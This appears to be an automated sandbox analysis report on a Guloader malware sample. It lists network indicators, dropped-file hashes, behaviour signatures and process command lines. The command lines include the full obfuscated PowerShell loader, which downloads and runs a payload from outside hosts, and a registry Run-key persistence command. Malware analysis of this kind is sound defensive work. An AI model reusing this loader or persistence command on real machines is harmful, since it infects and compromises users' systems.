| US | 8.8.8.8:53 | milanaces.com | udp |
| BG | 193.25.216.108:443 | milanaces.com | tcp |
| US | 8.8.8.8:53 | r10.o.lencr.org | udp |
| GB | 2.18.190.80:80 | r10.o.lencr.org | tcp |
| US | 8.8.8.8:53 | 108.216.25.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.245.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | janbours92harbu02.duckdns.org | udp |
| US | 192.169.69.26:3980 | janbours92harbu02.duckdns.org | tcp |
| US | 192.169.69.26:3981 | janbours92harbu02.duckdns.org | tcp |
| US | 8.8.8.8:53 | janbours92harbu03.duckdns.org | udp |
| US | 8.8.8.8:53 | 26.69.169.192.in-addr.arpa | udp |
| BE | 172.111.244.38:3980 | janbours92harbu03.duckdns.org | tcp |
| BE | 172.111.244.38:3980 | janbours92harbu03.duckdns.org | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 8.8.8.8:53 | 38.244.111.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.179.89.13.in-addr.arpa | udp |
Files
memory/3824-0-0x00007FF954D03000-0x00007FF954D05000-memory.dmp
memory/3824-1-0x000001FF70890000-0x000001FF708B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1xevpyg1.cgr.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3824-11-0x00007FF954D00000-0x00007FF9557C1000-memory.dmp
memory/3824-12-0x00007FF954D00000-0x00007FF9557C1000-memory.dmp
memory/3592-15-0x0000000003040000-0x0000000003076000-memory.dmp
memory/3592-16-0x0000000005CA0000-0x00000000062C8000-memory.dmp
memory/3592-17-0x0000000005AB0000-0x0000000005AD2000-memory.dmp
memory/3592-18-0x0000000005B50000-0x0000000005BB6000-memory.dmp
memory/3592-19-0x00000000062D0000-0x0000000006336000-memory.dmp
memory/3592-29-0x0000000006370000-0x00000000066C4000-memory.dmp
memory/3592-30-0x0000000006960000-0x000000000697E000-memory.dmp
memory/3592-31-0x00000000069A0000-0x00000000069EC000-memory.dmp
memory/3592-32-0x0000000008190000-0x000000000880A000-memory.dmp
memory/3592-33-0x0000000006EF0000-0x0000000006F0A000-memory.dmp
memory/3592-34-0x0000000007C30000-0x0000000007CC6000-memory.dmp
memory/3592-35-0x0000000007BC0000-0x0000000007BE2000-memory.dmp
memory/3592-36-0x0000000008DC0000-0x0000000009364000-memory.dmp
C:\Users\Admin\AppData\Roaming\Coqueluche14.myx
| MD5 | 8e72b507dadf417f0f922a8cc04533d5 |
| SHA1 | d2fb1f560d46af90f009069855dc1f94179c5b6a |
| SHA256 | 84414a0537ef3bc82cbfd3fb17cce836352ae76a21499f4a0c25c2163606868c |
| SHA512 | cd317c3c2a44b531a29ea7fd3c8c3195aece36e9afeede35b06cb51b73faa0c14f0fef5b4c7a73aab14be0565466c58af746ce5517b094ddef1d0c19b785ed3b |
memory/3592-38-0x0000000009370000-0x000000000A320000-memory.dmp
memory/3824-40-0x00007FF954D03000-0x00007FF954D05000-memory.dmp
memory/3824-41-0x00007FF954D00000-0x00007FF9557C1000-memory.dmp
memory/4100-48-0x00000000020E0000-0x0000000003090000-memory.dmp
memory/3824-50-0x00007FF954D00000-0x00007FF9557C1000-memory.dmp
memory/2904-55-0x0000000000400000-0x0000000000478000-memory.dmp
memory/3272-56-0x0000000000400000-0x0000000000462000-memory.dmp
memory/400-57-0x0000000000400000-0x0000000000424000-memory.dmp
memory/4100-90-0x0000000003260000-0x0000000003279000-memory.dmp
memory/4100-94-0x0000000003260000-0x0000000003279000-memory.dmp
memory/4100-93-0x0000000003260000-0x0000000003279000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-09 18:54
Reported
2024-07-09 18:56
Platform
win7-20240708-en
Max time kernel
117s
Max time network
119s
Command Line
Signatures
Guloader,Cloudeye
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\Algoritmiskes = "%Paginerende% -w 1 $elektronspillets=(Get-ItemProperty -Path 'HKCU:\\Coindication\\').Fyrsvamp;%Paginerende% ($elektronspillets)" | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3068 set thread context of 1240 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b13adc656bdc9a6425b6075e7f016debcea9cca87ccdc9faca337a03f31b4c79.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems';If (${host}.CurrentCulture) {$Dominator++;}Function Swatheable($Ethography){$Etagevaskens=$Ethography.Length-$Dominator;$Aseismic='SUBsTR';$Aseismic+='ing';For( $Sluicing=1;$Sluicing -lt $Etagevaskens;$Sluicing+=2){$Dissatisfying+=$Ethography.$Aseismic.Invoke( $Sluicing, $Dominator);}$Dissatisfying;}function Overdaadiges($Writeup227){ . ($Eftersynkroniser) ($Writeup227);}$Riffelgangen=Swatheable 'BMAoUz.i,l l a,/E5 . 0K ( W iMn d.o,wRs N Tg p1.0 . 0 ;. WFi nB6 4S;, x 6A4B;, sr,v : 1.2.1 . 0g) BGLe c.ksoA/f2 0 1m0M0 1O0,1, FSiDrFeRf o x /K1 2U1T. 0R ';$Spaltedefinition=Swatheable 'PU s eOrS- ADg.eSn t. ';$Stormhat=Swatheable 'Ph t t p sN:T/s/Bm,o.v.i e s.mDaRc kBtAa.l kE. c oKm /RKSoOl oTnAiGaTl vSa,r e nA. eBm,zI>IhNtKt pns.: /,/FmKiElRaLnsa,cDeJs,.OcSo m,/CKDo lTo n,i a lVv aLr e,n .UeOm z > hUtPt p :A/./C1 0R3 .R1F9,5.. 2.3Y7,.C4 3H/ K o l o nBi.a,lSvFa rAeUnF.Se,mAz.> h tht.p s :./ /DfCi,rSsUt 4.lNoPc.k s mGiMtBh sA.Bc oI. u k,/HK.oMleo.nLiFa l vIa.rPefnM. eKm.z ';$Barskt=Swatheable '.>S ';$Eftersynkroniser=Swatheable ' iSeOx. ';$Hyperpolysyllabically='Nederdrgtigeres';$Direktrstols = Swatheable 'Be,c h,o %DaJpvp dOaHtPaP%.\,CSo q u,e l.uVc,h e 1,4S.Mm,y xL V&S& Re.c hDo FtE ';Overdaadiges (Swatheable 'H$ g lHoNbtavl,:KDLozgVw o o d =H(,c m d, /.cH $ DEiKrPe.kItDr.s,t oTl s )A ');Overdaadiges (Swatheable ' $ g.l o bSa.lP: O,t.aUrRiIi.n eM= $DS tLoUr mHh a.tM.Js p lBiHt (S$ B a r sSk t )L ');Overdaadiges (Swatheable 'P[ NBe t . S.e rSv.iUc e PIo iBn.tFM aDn.a g eRr ]P: :BS,eEcNu r iItmyFP rUoWtBo cPoUl .=S [SN,eIt .HS eAcPuUriiAtAyFPKr oHthoPcSoDl T.y p eM]k: :,TSlGsA1,2a ');$Stormhat=$Otariine[0];$Maintainable= (Swatheable 'l$sgOl.oFbaaKlL:.G e nfn.eUmMsAn iEt.sPtSa lPsB=RNAe,wP-,ORbIj,eSc t NS y s,t.eHm . N eHt . W,eSb.C,l iSe n t');$Maintainable+=$Dogwood[1];Overdaadiges ($Maintainable);Overdaadiges (Swatheable 'B$ G eAn nAe m.s n i tVsSt acl.s..,HDeMa d,e,rms [ $ S p.a.lSt.e d e fCiCn i t,i,o n ].=,$SR,iMf.fDe l g.aSn gJeOnB ');$Uddunstningen=Swatheable 'A$.G e n,n e mBsTnci tBsGt,aLl s..MD,oAw nMl,oGa d FDihlFe ( $ SHtBo r m hVaAtK, $ l,o kBaTlOi sDe rPi nMgPsUpar,iMn c i pSpHe,r.nEe sD) ';$lokaliseringsprincippernes=$Dogwood[0];Overdaadiges (Swatheable ' $Cg l oSb.aIl.:URAeInMgBuOeSrMa = (ST e s tF- PSaAt hW U$BlRoSkNa.l.iDsAeMr i,n g.s p.rNi n cSirpbpAeBr.nAe s )C ');while (!$Renguera) {Overdaadiges (Swatheable '.$ gIl o bAaFlS:ML.uKf.t e nEs,=O$ t rOu.e, ') ;Overdaadiges $Uddunstningen;Overdaadiges (Swatheable ',S,tna.rPtH-US lre eTpC .4. ');Overdaadiges (Swatheable 'R$Wg l.oSb akl :SR eDn.gPu eCr,a = (LT,eUs tD-EP.aStNh B$ l o kSaul,iTs,e r i nPgSsTp r ibn cBi.pPpAe.r nSe,s,)U ') ;Overdaadiges (Swatheable ',$Sgal oObFa.lM:FU,nShBeGrUmCistDi cCa.l.lSyP= $,g lVo bRaKl,:,KRv a tDoirAi abl gFuAi nfeUaBn e,rKe n + +P%N$OO t.aTrMi i n,eD. c oSuPnLtV ') ;$Stormhat=$Otariine[$Unhermitically];}$Agnellis=370878;$Underprikket=26015;Overdaadiges (Swatheable '.$TgEl.oAbEa l :AHSmUo,sStHa sAepoTmMr a a dPe.tA F=. AG eIt.-.CFo n tFe n,tB R$Sl o,kAaIl,iTs e rKiSnAgSs pnr,iWn,c.iMp pKeIr nTefsB ');Overdaadiges (Swatheable 'p$KgSl o b,aAl.:IT,eFlTeMsscCoTpUiBn gD H=I ,[,S yDs,t e,m .FC o nTv e.rUt,] :O: F r.o.mTB abs e.6U4 S t,r.i n g (Q$ HDmSoSs tAa.s e.oKmUr.aTaKd e.tS), ');Overdaadiges (Swatheable '.$.gbl o b.aBlU: TLa k tVn x rN =, ,[dS,y,sDtVetm.. TSeBx tS.IE nAcUo dCi nLg ] :D:LA.SrC.I,IM.NG eLt SKtIrCiRn g (K$CTAe l e s.c,oPpLi,nfg )H ');Overdaadiges (Swatheable 'D$,gClSo bAaMlO: S.tAuTb s = $,T,a,kUt.n,xTr . sDumb sUt,r.i.n.g,(P$DAAgTnIe lAlNi.s ,f$TUFnld e rBpFr iAk kSeYtS)S ');Overdaadiges $Stubs;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coqueluche14.myx && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems';If (${host}.CurrentCulture) {$Dominator++;}Function Swatheable($Ethography){$Etagevaskens=$Ethography.Length-$Dominator;$Aseismic='SUBsTR';$Aseismic+='ing';For( $Sluicing=1;$Sluicing -lt $Etagevaskens;$Sluicing+=2){$Dissatisfying+=$Ethography.$Aseismic.Invoke( $Sluicing, $Dominator);}$Dissatisfying;}function Overdaadiges($Writeup227){ . ($Eftersynkroniser) ($Writeup227);}$Riffelgangen=Swatheable 'BMAoUz.i,l l a,/E5 . 0K ( W iMn d.o,wRs N Tg p1.0 . 0 ;. WFi nB6 4S;, x 6A4B;, sr,v : 1.2.1 . 0g) BGLe c.ksoA/f2 0 1m0M0 1O0,1, FSiDrFeRf o x /K1 2U1T. 0R ';$Spaltedefinition=Swatheable 'PU s eOrS- ADg.eSn t. ';$Stormhat=Swatheable 'Ph t t p sN:T/s/Bm,o.v.i e s.mDaRc kBtAa.l kE. c oKm /RKSoOl oTnAiGaTl vSa,r e nA. eBm,zI>IhNtKt pns.: /,/FmKiElRaLnsa,cDeJs,.OcSo m,/CKDo lTo n,i a lVv aLr e,n .UeOm z > hUtPt p :A/./C1 0R3 .R1F9,5.. 2.3Y7,.C4 3H/ K o l o nBi.a,lSvFa rAeUnF.Se,mAz.> h tht.p s :./ /DfCi,rSsUt 4.lNoPc.k s mGiMtBh sA.Bc oI. u k,/HK.oMleo.nLiFa l vIa.rPefnM. eKm.z ';$Barskt=Swatheable '.>S ';$Eftersynkroniser=Swatheable ' iSeOx. ';$Hyperpolysyllabically='Nederdrgtigeres';$Direktrstols = Swatheable 'Be,c h,o %DaJpvp dOaHtPaP%.\,CSo q u,e l.uVc,h e 1,4S.Mm,y xL V&S& Re.c hDo FtE ';Overdaadiges (Swatheable 'H$ g lHoNbtavl,:KDLozgVw o o d =H(,c m d, /.cH $ DEiKrPe.kItDr.s,t oTl s )A ');Overdaadiges (Swatheable ' $ g.l o bSa.lP: O,t.aUrRiIi.n eM= $DS tLoUr mHh a.tM.Js p lBiHt (S$ B a r sSk t )L ');Overdaadiges (Swatheable 'P[ NBe t . S.e rSv.iUc e PIo iBn.tFM aDn.a g eRr ]P: :BS,eEcNu r iItmyFP rUoWtBo cPoUl .=S [SN,eIt .HS eAcPuUriiAtAyFPKr oHthoPcSoDl T.y p eM]k: :,TSlGsA1,2a ');$Stormhat=$Otariine[0];$Maintainable= (Swatheable 'l$sgOl.oFbaaKlL:.G e nfn.eUmMsAn iEt.sPtSa lPsB=RNAe,wP-,ORbIj,eSc t NS y s,t.eHm . N eHt . W,eSb.C,l iSe n t');$Maintainable+=$Dogwood[1];Overdaadiges ($Maintainable);Overdaadiges (Swatheable 'B$ G eAn nAe m.s n i tVsSt acl.s..,HDeMa d,e,rms [ $ S p.a.lSt.e d e fCiCn i t,i,o n ].=,$SR,iMf.fDe l g.aSn gJeOnB ');$Uddunstningen=Swatheable 'A$.G e n,n e mBsTnci tBsGt,aLl s..MD,oAw nMl,oGa d FDihlFe ( $ SHtBo r m hVaAtK, $ l,o kBaTlOi sDe rPi nMgPsUpar,iMn c i pSpHe,r.nEe sD) ';$lokaliseringsprincippernes=$Dogwood[0];Overdaadiges (Swatheable ' $Cg l oSb.aIl.:URAeInMgBuOeSrMa = (ST e s tF- PSaAt hW U$BlRoSkNa.l.iDsAeMr i,n g.s p.rNi n cSirpbpAeBr.nAe s )C ');while (!$Renguera) {Overdaadiges (Swatheable '.$ gIl o bAaFlS:ML.uKf.t e nEs,=O$ t rOu.e, ') ;Overdaadiges $Uddunstningen;Overdaadiges (Swatheable ',S,tna.rPtH-US lre eTpC .4. ');Overdaadiges (Swatheable 'R$Wg l.oSb akl :SR eDn.gPu eCr,a = (LT,eUs tD-EP.aStNh B$ l o kSaul,iTs,e r i nPgSsTp r ibn cBi.pPpAe.r nSe,s,)U ') ;Overdaadiges (Swatheable ',$Sgal oObFa.lM:FU,nShBeGrUmCistDi cCa.l.lSyP= $,g lVo bRaKl,:,KRv a tDoirAi abl gFuAi nfeUaBn e,rKe n + +P%N$OO t.aTrMi i n,eD. c oSuPnLtV ') ;$Stormhat=$Otariine[$Unhermitically];}$Agnellis=370878;$Underprikket=26015;Overdaadiges (Swatheable '.$TgEl.oAbEa l :AHSmUo,sStHa sAepoTmMr a a dPe.tA F=. AG eIt.-.CFo n tFe n,tB R$Sl o,kAaIl,iTs e rKiSnAgSs pnr,iWn,c.iMp pKeIr nTefsB ');Overdaadiges (Swatheable 'p$KgSl o b,aAl.:IT,eFlTeMsscCoTpUiBn gD H=I ,[,S yDs,t e,m .FC o nTv e.rUt,] :O: F r.o.mTB abs e.6U4 S t,r.i n g (Q$ HDmSoSs tAa.s e.oKmUr.aTaKd e.tS), ');Overdaadiges (Swatheable '.$.gbl o b.aBlU: TLa k tVn x rN =, ,[dS,y,sDtVetm.. TSeBx tS.IE nAcUo dCi nLg ] :D:LA.SrC.I,IM.NG eLt SKtIrCiRn g (K$CTAe l e s.c,oPpLi,nfg )H ');Overdaadiges (Swatheable 'D$,gClSo bAaMlO: S.tAuTb s = $,T,a,kUt.n,xTr . sDumb sUt,r.i.n.g,(P$DAAgTnIe lAlNi.s ,f$TUFnld e rBpFr iAk kSeYtS)S ');Overdaadiges $Stubs;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coqueluche14.myx && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Algoritmiskes" /t REG_EXPAND_SZ /d "%Paginerende% -w 1 $elektronspillets=(Get-ItemProperty -Path 'HKCU:\Coindication\').Fyrsvamp;%Paginerende% ($elektronspillets)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Algoritmiskes" /t REG_EXPAND_SZ /d "%Paginerende% -w 1 $elektronspillets=(Get-ItemProperty -Path 'HKCU:\Coindication\').Fyrsvamp;%Paginerende% ($elektronspillets)"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | moviesmacktalk.com | udp |
| RO | 89.42.218.27:443 | moviesmacktalk.com | tcp |
| RO | 89.42.218.27:443 | moviesmacktalk.com | tcp |
| RO | 89.42.218.27:443 | moviesmacktalk.com | tcp |
| RO | 89.42.218.27:443 | moviesmacktalk.com | tcp |
| US | 8.8.8.8:53 | milanaces.com | udp |
| BG | 193.25.216.108:443 | milanaces.com | tcp |
| BG | 193.25.216.108:443 | milanaces.com | tcp |
| US | 8.8.8.8:53 | r10.o.lencr.org | udp |
| GB | 2.18.190.80:80 | r10.o.lencr.org | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\CabA8DF.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
memory/2692-20-0x000007FEF518E000-0x000007FEF518F000-memory.dmp
memory/2692-21-0x000000001B6D0000-0x000000001B9B2000-memory.dmp
memory/2692-23-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp
memory/2692-22-0x0000000002390000-0x0000000002398000-memory.dmp
memory/2692-25-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp
memory/2692-24-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp
memory/2692-26-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp
memory/2692-27-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CKQ750OV55N18BSWUFGX.temp
| MD5 | 9e3cc2afba423713dce0862a1e7665d2 |
| SHA1 | 0bdb1a8f2eb12e130479cc48a0c47ffb6626dcd4 |
| SHA256 | 7a2b0a49611fee20dc9456e231b724c213e46a0526bb9f8a80f7603a293cd6e3 |
| SHA512 | baa44caf9146d6a84b1ba6a688a3f71c210eac4d6fdc3c84395f2c3211b8375e28520293f000595e4d7e2de2b974f02821a41e06fa3ec5490e1438dd58e47f2d |
C:\Users\Admin\AppData\Roaming\Coqueluche14.myx
| MD5 | 8e72b507dadf417f0f922a8cc04533d5 |
| SHA1 | d2fb1f560d46af90f009069855dc1f94179c5b6a |
| SHA256 | 84414a0537ef3bc82cbfd3fb17cce836352ae76a21499f4a0c25c2163606868c |
| SHA512 | cd317c3c2a44b531a29ea7fd3c8c3195aece36e9afeede35b06cb51b73faa0c14f0fef5b4c7a73aab14be0565466c58af746ce5517b094ddef1d0c19b785ed3b |
memory/2692-33-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp
memory/2692-35-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp
memory/2692-34-0x000007FEF518E000-0x000007FEF518F000-memory.dmp
memory/3068-36-0x00000000065F0000-0x00000000075A0000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6abcb26f8bccc06ba812dbffc5933a96 |
| SHA1 | 4305c908a01dd8059406a15e6b1daaeb7e20db61 |
| SHA256 | 1da0c861ce504db27e0e764d019af6adf23d5987a9498ffc6446365030793a77 |
| SHA512 | 30448bb88214cd2059ec7718ad9245d3eb0d86666ed7d2e2ff6fbe6bea582c65afe0e78c22a7aaf084b1efdc4e123eceb980ad0bf99eb7bb26aad8896e1ff2ba |
C:\Users\Admin\AppData\Local\Temp\Tar6597.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
memory/1240-54-0x0000000000B70000-0x0000000001BD2000-memory.dmp
memory/1240-56-0x0000000001BE0000-0x0000000002B90000-memory.dmp
memory/2692-59-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp